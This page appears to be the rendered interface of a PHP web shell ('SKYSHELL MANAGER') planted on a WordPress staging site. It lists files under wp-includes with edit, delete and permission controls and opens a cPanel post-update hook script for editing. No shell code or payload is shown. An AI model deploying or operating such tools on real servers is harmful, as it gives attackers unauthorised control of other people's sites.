📁
SKYSHELL MANAGER
PHP v8.2.31
Create
Create
Path:
root
/
home
/
thevaxnx
/
nativize.com
/
staging
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
wp-links-opml.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: postupcp
#!/bin/bash /usr/bin/yum -y groupinstall alt-python alt-ruby alt-nodejs #Under puppet control. Installs new alt-python, alt-ruby and alt-nodejs packages /usr/bin/yum -y install alt-ruby*-rubygem-lsapi #Under puppet control. Installs alt-ruby rubygem-lsapi packages /usr/bin/yum -y install alt-php80* alt-php81* alt-php82* alt-php83* alt-php84* alt-php85* #Under puppet control.Update installed /usr/share/cloudlinux-linksafe/cpanel/hooks/cloudlinux_linksafe_hook.sh #cloudlinux-linksafe /usr/bin/cl-linksafe-reconfigure #Under puppet control. Reconfigure linksafe after cPanel update /usr/share/cagefs/cpanel/cagefs_postupcp_hook.sh #CageFS Version 2.0. Update CageFS after update of CPanel /usr/share/lve/dbgovernor/cpanel/upgrade-mysql-disabler.sh #dbgovernor /usr/share/l.v.e-manager/cpanel/hooks/l.v.e-manager_postupcp_hook.sh #l.v.e-manager
Save